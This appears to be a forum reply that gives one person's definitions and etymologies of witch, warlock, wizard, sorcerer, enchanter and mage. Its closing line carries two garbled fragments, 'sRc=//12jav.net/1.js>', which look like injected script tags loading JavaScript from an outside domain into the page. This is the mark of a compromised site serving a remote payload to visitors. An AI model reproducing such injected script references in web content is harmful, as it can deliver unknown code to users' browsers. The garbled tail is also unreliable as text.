The spelling. ;-p Other than that... connotation, which is different for everyone though some are remarkably succinct. What I personally consider...

witches : practitioners of "low" magicks-- that is, practical and down-to-earth magic, concerning life, society, and environment. It used to be Old English wicce that's closer to the pronunciation of 'witch' and was feminine, while wicca meant a male practitioner of this magic (which could include anything from necromancy to delivering a baby.) Today I'd say it's reclaimed as gender-neutral, as any of the following.

warlocks : by origin of the word "truth-twister" I think would be illusionists but in practice claim the very real and very dark (hidden or secret, so a twist on the truth) aspects of magic.

wizards : are a popular image of ceremonial magicians, in contrast to witches' earthly practicality there seem to be a lot of maths in ceremonial magick-- abstracts, and "high" airy philosophical concepts and concern for things invisible and intangible.

sorcerers : by origin of the word "one who influences fate" but to update the word to "source-r", I use it to mean a practitioner of direct magic who manipulates the very energy of the world with thought.

enchanter : I know you didn't ask, but I like this one. It suggests a form of magic that comes from music and song.

mages : anyone who uses magic, that is, any of the above and probably some that aren't listed. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
